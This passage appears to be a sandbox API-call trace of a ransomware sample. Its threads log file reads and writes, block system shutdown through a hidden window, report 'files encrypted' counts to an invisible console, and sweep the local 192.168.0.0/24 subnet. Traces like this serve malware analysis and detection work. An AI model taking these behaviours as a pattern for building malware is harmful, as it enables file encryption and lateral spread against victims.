CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0210.239] ReadFile (in: hFile=0x238, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x73d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0210.241] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0210.241] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0210.264] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1d3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0210.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0210.268] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0210.268] GetQueuedCompletionStatus (CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff) Thread: id = 18 os_tid = 0x994 [0073.458] RegisterClassA (lpWndClass=0x372ff2c) returned 0xcfc149 [0073.459] CreateWindowExA (dwExStyle=0x200, lpClassName="HUCA1LH41X24FV3", lpWindowName="VSEL74BT1EP29R3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=240, nHeight=120, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x30274 [0073.461] GetModuleHandleA (lpModuleName="user32") returned 0x77130000 [0073.461] GetProcAddress (hModule=0x77130000, lpProcName="ShutdownBlockReasonCreate") returned 0x771aa84e [0073.461] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x24, wParam=0x0, lParam=0x372fb18) returned 0x0 [0073.462] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x81, wParam=0x0, lParam=0x372fb0c) returned 0x1 [0073.464] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x83, wParam=0x0, lParam=0x372faf8) returned 0x0 [0074.410] ShutdownBlockReasonCreate (hWnd=0x30274, pwszReason=0x0) returned 0 [0074.411] GetMessageA (lpMsg=0x372ff54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) [0095.949] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0100.175] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0103.777] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0108.329] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0112.411] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0114.279] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0118.561] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0122.719] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0126.263] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0139.600] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0142.833] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0146.040] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0148.110] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0152.242] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0154.806] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0160.272] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0162.481] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0165.621] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0169.416] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0169.990] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0174.948] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0177.228] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0177.750] NtdllDefWindowProc_A (hWnd=0x30274, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 Thread: id = 19 os_tid = 0x9a4 [0073.754] Sleep (dwMilliseconds=0x493e0) [0089.361] wvsprintfA (in: param_1=0x386fa08, param_2="%ld files encrypted; speed %ld files/sec", arglist=0x386ff48 | out: param_1="303 files encrypted; speed 1 files/sec") returned 38 [0089.361] wsprintfA (in: param_1=0x386fa08, param_2="%s\r\n" | out: param_1="303 files encrypted; speed 1 files/sec\r\n") returned 40 [0089.361] GetLocalTime (in: lpSystemTime=0x386ff08 | out: lpSystemTime=0x386ff08*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x14, wSecond=0x2, wMilliseconds=0x2df)) [0089.361] wsprintfA (in: param_1=0x386fe08, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:24:52] ") returned 11 [0089.361] SetThreadUILanguage (LangId=0x409) returned 0x409 [0089.362] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0089.375] WriteFile (in: hFile=0x7, lpBuffer=0x386fe08*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fe08*, lpNumberOfBytesWritten=0x386ff34*=0xb, lpOverlapped=0x0) returned 1 [0089.381] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0089.382] WriteFile (in: hFile=0x7, lpBuffer=0x386fa08*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fa08*, lpNumberOfBytesWritten=0x386ff34*=0x28, lpOverlapped=0x0) returned 1 [0089.384] GetConsoleWindow () returned 0x5011c [0089.384] IsWindowVisible (hWnd=0x5011c) returned 0 [0089.386] Sleep (dwMilliseconds=0x493e0) [0100.476] wvsprintfA (in: param_1=0x386fa08, param_2="%ld files encrypted; speed %ld files/sec", arglist=0x386ff48 | out: param_1="75 files encrypted; speed 0 files/sec") returned 37 [0100.476] wsprintfA (in: param_1=0x386fa08, param_2="%s\r\n" | out: param_1="75 files encrypted; speed 0 files/sec\r\n") returned 39 [0100.476] GetLocalTime (in: lpSystemTime=0x386ff08 | out: lpSystemTime=0x386ff08*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x14, wSecond=0xc, wMilliseconds=0x32c)) [0100.476] wsprintfA (in: param_1=0x386fe08, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:29:52] ") returned 11 [0100.477] SetThreadUILanguage (LangId=0x409) returned 0x409 [0100.477] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0100.480] WriteFile (in: hFile=0x7, lpBuffer=0x386fe08*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fe08*, lpNumberOfBytesWritten=0x386ff34*=0xb, lpOverlapped=0x0) returned 1 [0100.482] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0100.484] WriteFile (in: hFile=0x7, lpBuffer=0x386fa08*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fa08*, lpNumberOfBytesWritten=0x386ff34*=0x27, lpOverlapped=0x0) returned 1 [0100.487] GetConsoleWindow () returned 0x5011c [0100.497] IsWindowVisible (hWnd=0x5011c) returned 0 [0100.497] Sleep (dwMilliseconds=0x493e0) [0110.821] wvsprintfA (in: param_1=0x386fa08, param_2="%ld files encrypted; speed %ld files/sec", arglist=0x386ff48 | out: param_1="205 files encrypted; speed 0 files/sec") returned 38 [0110.821] wsprintfA (in: param_1=0x386fa08, param_2="%s\r\n" | out: param_1="205 files encrypted; speed 0 files/sec\r\n") returned 40 [0110.821] GetLocalTime (in: lpSystemTime=0x386ff08 | out: lpSystemTime=0x386ff08*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x14, wSecond=0x17, wMilliseconds=0x5d)) [0110.821] wsprintfA (in: param_1=0x386fe08, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:34:53] ") returned 11 [0110.821] SetThreadUILanguage (LangId=0x409) returned 0x409 [0110.821] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0111.799] WriteFile (in: hFile=0x7, lpBuffer=0x386fe08*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fe08*, lpNumberOfBytesWritten=0x386ff34*=0xb, lpOverlapped=0x0) returned 1 [0112.089] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0112.089] WriteFile (in: hFile=0x7, lpBuffer=0x386fa08*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fa08*, lpNumberOfBytesWritten=0x386ff34*=0x28, lpOverlapped=0x0) returned 1 [0112.123] GetConsoleWindow () returned 0x5011c [0112.124] IsWindowVisible (hWnd=0x5011c) returned 0 [0112.124] Sleep (dwMilliseconds=0x493e0) [0122.139] wvsprintfA (in: param_1=0x386fa08, param_2="%ld files encrypted; speed %ld files/sec", arglist=0x386ff48 | out: param_1="223 files encrypted; speed 0 files/sec") returned 38 [0122.139] wsprintfA (in: param_1=0x386fa08, param_2="%s\r\n" | out: param_1="223 files encrypted; speed 0 files/sec\r\n") returned 40 [0122.139] GetLocalTime (in: lpSystemTime=0x386ff08 | out: lpSystemTime=0x386ff08*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x14, wSecond=0x22, wMilliseconds=0x1a2)) [0122.139] wsprintfA (in: param_1=0x386fe08, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:39:54] ") returned 11 [0122.139] SetThreadUILanguage (LangId=0x409) returned 0x409 [0122.140] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0122.140] WriteFile (in: hFile=0x7, lpBuffer=0x386fe08*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fe08*, lpNumberOfBytesWritten=0x386ff34*=0xb, lpOverlapped=0x0) returned 1 [0122.141] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0122.141] WriteFile (in: hFile=0x7, lpBuffer=0x386fa08*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fa08*, lpNumberOfBytesWritten=0x386ff34*=0x28, lpOverlapped=0x0) returned 1 [0122.142] GetConsoleWindow () returned 0x5011c [0122.142] IsWindowVisible (hWnd=0x5011c) returned 0 [0122.142] Sleep (dwMilliseconds=0x493e0) [0132.161] wvsprintfA (in: param_1=0x386fa08, param_2="%ld files encrypted; speed %ld files/sec", arglist=0x386ff48 | out: param_1="42 files encrypted; speed 0 files/sec") returned 37 [0132.161] wsprintfA (in: param_1=0x386fa08, param_2="%s\r\n" | out: param_1="42 files encrypted; speed 0 files/sec\r\n") returned 39 [0132.161] GetLocalTime (in: lpSystemTime=0x386ff08 | out: lpSystemTime=0x386ff08*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x14, wSecond=0x2c, wMilliseconds=0x1b2)) [0132.161] wsprintfA (in: param_1=0x386fe08, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:44:54] ") returned 11 [0132.162] SetThreadUILanguage (LangId=0x409) returned 0x409 [0132.162] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0132.162] WriteFile (in: hFile=0x7, lpBuffer=0x386fe08*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fe08*, lpNumberOfBytesWritten=0x386ff34*=0xb, lpOverlapped=0x0) returned 1 [0132.162] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0132.162] WriteFile (in: hFile=0x7, lpBuffer=0x386fa08*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fa08*, lpNumberOfBytesWritten=0x386ff34*=0x27, lpOverlapped=0x0) returned 1 [0132.163] GetConsoleWindow () returned 0x5011c [0132.163] IsWindowVisible (hWnd=0x5011c) returned 0 [0132.163] Sleep (dwMilliseconds=0x493e0) [0142.171] wvsprintfA (in: param_1=0x386fa08, param_2="%ld files encrypted; speed %ld files/sec", arglist=0x386ff48 | out: param_1="143 files encrypted; speed 0 files/sec") returned 38 [0142.172] wsprintfA (in: param_1=0x386fa08, param_2="%s\r\n" | out: param_1="143 files encrypted; speed 0 files/sec\r\n") returned 40 [0142.172] GetLocalTime (in: lpSystemTime=0x386ff08 | out: lpSystemTime=0x386ff08*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x14, wSecond=0x36, wMilliseconds=0x1c1)) [0142.172] wsprintfA (in: param_1=0x386fe08, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:49:54] ") returned 11 [0142.172] SetThreadUILanguage (LangId=0x409) returned 0x409 [0142.172] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0142.173] WriteFile (in: hFile=0x7, lpBuffer=0x386fe08*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fe08*, lpNumberOfBytesWritten=0x386ff34*=0xb, lpOverlapped=0x0) returned 1 [0142.176] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0142.178] WriteFile (in: hFile=0x7, lpBuffer=0x386fa08*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fa08*, lpNumberOfBytesWritten=0x386ff34*=0x28, lpOverlapped=0x0) returned 1 [0142.185] GetConsoleWindow () returned 0x5011c [0142.190] IsWindowVisible (hWnd=0x5011c) returned 0 [0142.191] Sleep (dwMilliseconds=0x493e0) [0152.219] wvsprintfA (in: param_1=0x386fa08, param_2="%ld files encrypted; speed %ld files/sec", arglist=0x386ff48 | out: param_1="243 files encrypted; speed 0 files/sec") returned 38 [0152.219] wsprintfA (in: param_1=0x386fa08, param_2="%s\r\n" | out: param_1="243 files encrypted; speed 0 files/sec\r\n") returned 40 [0152.219] GetLocalTime (in: lpSystemTime=0x386ff08 | out: lpSystemTime=0x386ff08*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x15, wSecond=0x4, wMilliseconds=0x1e0)) [0152.219] wsprintfA (in: param_1=0x386fe08, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:54:54] ") returned 11 [0152.220] SetThreadUILanguage (LangId=0x409) returned 0x409 [0152.220] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0152.221] WriteFile (in: hFile=0x7, lpBuffer=0x386fe08*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fe08*, lpNumberOfBytesWritten=0x386ff34*=0xb, lpOverlapped=0x0) returned 1 [0152.221] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0152.221] WriteFile (in: hFile=0x7, lpBuffer=0x386fa08*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fa08*, lpNumberOfBytesWritten=0x386ff34*=0x28, lpOverlapped=0x0) returned 1 [0152.221] GetConsoleWindow () returned 0x5011c [0152.222] IsWindowVisible (hWnd=0x5011c) returned 0 [0152.222] Sleep (dwMilliseconds=0x493e0) [0162.270] wvsprintfA (in: param_1=0x386fa08, param_2="%ld files encrypted; speed %ld files/sec", arglist=0x386ff48 | out: param_1="275 files encrypted; speed 0 files/sec") returned 38 [0162.270] wsprintfA (in: param_1=0x386fa08, param_2="%s\r\n" | out: param_1="275 files encrypted; speed 0 files/sec\r\n") returned 40 [0162.270] GetLocalTime (in: lpSystemTime=0x386ff08 | out: lpSystemTime=0x386ff08*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x15, wSecond=0xe, wMilliseconds=0x1ef)) [0162.270] wsprintfA (in: param_1=0x386fe08, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:59:54] ") returned 11 [0162.270] SetThreadUILanguage (LangId=0x409) returned 0x409 [0162.270] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0162.271] WriteFile (in: hFile=0x7, lpBuffer=0x386fe08*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fe08*, lpNumberOfBytesWritten=0x386ff34*=0xb, lpOverlapped=0x0) returned 1 [0162.271] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0162.272] WriteFile (in: hFile=0x7, lpBuffer=0x386fa08*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fa08*, lpNumberOfBytesWritten=0x386ff34*=0x28, lpOverlapped=0x0) returned 1 [0162.272] GetConsoleWindow () returned 0x5011c [0162.272] IsWindowVisible (hWnd=0x5011c) returned 0 [0162.273] Sleep (dwMilliseconds=0x493e0) [0172.308] wvsprintfA (in: param_1=0x386fa08, param_2="%ld files encrypted; speed %ld files/sec", arglist=0x386ff48 | out: param_1="234 files encrypted; speed 0 files/sec") returned 38 [0172.308] wsprintfA (in: param_1=0x386fa08, param_2="%s\r\n" | out: param_1="234 files encrypted; speed 0 files/sec\r\n") returned 40 [0172.309] GetLocalTime (in: lpSystemTime=0x386ff08 | out: lpSystemTime=0x386ff08*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x15, wSecond=0x18, wMilliseconds=0x1fe)) [0172.309] wsprintfA (in: param_1=0x386fe08, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[09:04:54] ") returned 11 [0172.309] SetThreadUILanguage (LangId=0x409) returned 0x409 [0172.309] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0172.309] WriteFile (in: hFile=0x7, lpBuffer=0x386fe08*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fe08*, lpNumberOfBytesWritten=0x386ff34*=0xb, lpOverlapped=0x0) returned 1 [0172.310] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0172.310] WriteFile (in: hFile=0x7, lpBuffer=0x386fa08*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fa08*, lpNumberOfBytesWritten=0x386ff34*=0x28, lpOverlapped=0x0) returned 1 [0172.310] GetConsoleWindow () returned 0x5011c [0172.310] IsWindowVisible (hWnd=0x5011c) returned 0 [0172.310] Sleep (dwMilliseconds=0x493e0) [0193.743] wvsprintfA (in: param_1=0x386fa08, param_2="%ld files encrypted; speed %ld files/sec", arglist=0x386ff48 | out: param_1="389 files encrypted; speed 1 files/sec") returned 38 [0193.743] wsprintfA (in: param_1=0x386fa08, param_2="%s\r\n" | out: param_1="389 files encrypted; speed 1 files/sec\r\n") returned 40 [0193.743] GetLocalTime (in: lpSystemTime=0x386ff08 | out: lpSystemTime=0x386ff08*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x15, wSecond=0x22, wMilliseconds=0x20d)) [0193.743] wsprintfA (in: param_1=0x386fe08, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[09:09:54] ") returned 11 [0193.743] SetThreadUILanguage (LangId=0x409) returned 0x409 [0193.743] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0193.745] WriteFile (in: hFile=0x7, lpBuffer=0x386fe08*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fe08*, lpNumberOfBytesWritten=0x386ff34*=0xb, lpOverlapped=0x0) returned 1 [0193.746] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0193.746] WriteFile (in: hFile=0x7, lpBuffer=0x386fa08*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fa08*, lpNumberOfBytesWritten=0x386ff34*=0x28, lpOverlapped=0x0) returned 1 [0193.747] GetConsoleWindow () returned 0x5011c [0193.747] IsWindowVisible (hWnd=0x5011c) returned 0 [0193.747] Sleep (dwMilliseconds=0x493e0) [0206.379] wvsprintfA (in: param_1=0x386fa08, param_2="%ld files encrypted; speed %ld files/sec", arglist=0x386ff48 | out: param_1="486 files encrypted; speed 1 files/sec") returned 38 [0206.379] wsprintfA (in: param_1=0x386fa08, param_2="%s\r\n" | out: param_1="486 files encrypted; speed 1 files/sec\r\n") returned 40 [0206.379] GetLocalTime (in: lpSystemTime=0x386ff08 | out: lpSystemTime=0x386ff08*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x15, wSecond=0x2c, wMilliseconds=0x21c)) [0206.380] wsprintfA (in: param_1=0x386fe08, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[09:14:54] ") returned 11 [0206.380] SetThreadUILanguage (LangId=0x409) returned 0x409 [0206.380] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0206.380] WriteFile (in: hFile=0x7, lpBuffer=0x386fe08*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fe08*, lpNumberOfBytesWritten=0x386ff34*=0xb, lpOverlapped=0x0) returned 1 [0206.381] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0206.381] WriteFile (in: hFile=0x7, lpBuffer=0x386fa08*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x386ff34, lpOverlapped=0x0 | out: lpBuffer=0x386fa08*, lpNumberOfBytesWritten=0x386ff34*=0x28, lpOverlapped=0x0) returned 1 [0206.384] GetConsoleWindow () returned 0x5011c [0206.384] IsWindowVisible (hWnd=0x5011c) returned 0 [0206.384] Sleep (dwMilliseconds=0x493e0) Thread: id = 20 os_tid = 0x9b4 [0073.754] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x39af9f8 | out: lpWSAData=0x39af9f8) returned 0 [0074.389] malloc (_Size=0x8) returned 0x1fa03e8 [0074.389] RtlInitializeSListHead (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) [0074.390] Sleep (dwMilliseconds=0x2710) [0089.362] malloc (_Size=0x288) returned 0x1ff1930 [0089.363] GetAdaptersInfo (in: AdapterInfo=0x1ff1930, SizePointer=0x39af9e0 | out: AdapterInfo=0x1ff1930, SizePointer=0x39af9e0) returned 0x0 [0089.883] GetAdaptersInfo (in: AdapterInfo=0x1ff1930, SizePointer=0x39af9e0 | out: AdapterInfo=0x1ff1930, SizePointer=0x39af9e0) returned 0x0 [0089.886] lstrcmpiA (lpString1="192.168.0.145", lpString2="0.0.0.0") returned 1 [0089.886] PathRemoveExtensionA (in: pszPath="192.168.0.145" | out: pszPath="192.168.0") [0089.886] wvsprintfA (in: param_1=0x39af444, param_2="Local subnet %s.0/24", arglist=0x39af984 | out: param_1="Local subnet 192.168.0.0/24") returned 27 [0089.886] wsprintfA (in: param_1=0x39af444, param_2="%s\r\n" | out: param_1="Local subnet 192.168.0.0/24\r\n") returned 29 [0089.886] GetLocalTime (in: lpSystemTime=0x39af944 | out: lpSystemTime=0x39af944*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x14, wSecond=0x2, wMilliseconds=0x34c)) [0089.886] wsprintfA (in: param_1=0x39af844, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:20:02] ") returned 11 [0089.886] SetThreadUILanguage (LangId=0x409) returned 0x409 [0089.887] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0089.887] WriteFile (in: hFile=0x7, lpBuffer=0x39af844*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x39af970, lpOverlapped=0x0 | out: lpBuffer=0x39af844*, lpNumberOfBytesWritten=0x39af970*=0xb, lpOverlapped=0x0) returned 1 [0089.887] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0089.888] WriteFile (in: hFile=0x7, lpBuffer=0x39af444*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x39af970, lpOverlapped=0x0 | out: lpBuffer=0x39af444*, lpNumberOfBytesWritten=0x39af970*=0x1d, lpOverlapped=0x0) returned 1 [0089.888] GetConsoleWindow () returned 0x5011c [0089.888] IsWindowVisible (hWnd=0x5011c) returned 0 [0089.889] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.0") returned 11 [0089.889] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.0") returned 1 [0089.889] malloc (_Size=0x1c) returned 0x77fea0 [0089.889] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x77fea0 | out: ListHead=0x1fa03e8, ListEntry=0x77fea0) returned 0x0 [0089.889] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.1") returned 11 [0089.889] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.1") returned 1 [0089.889] malloc (_Size=0x1c) returned 0x77fef8 [0089.889] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x77fef8 | out: ListHead=0x1fa03e8, ListEntry=0x77fef8) returned 0x77fea0 [0089.889] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.2") returned 11 [0089.889] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.2") returned -1 [0089.889] malloc (_Size=0x1c) returned 0x1fa0330 [0089.889] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x1fa0330 | out: ListHead=0x1fa03e8, ListEntry=0x1fa0330) returned 0x77fef8 [0089.889] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.3") returned 11 [0089.889] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.3") 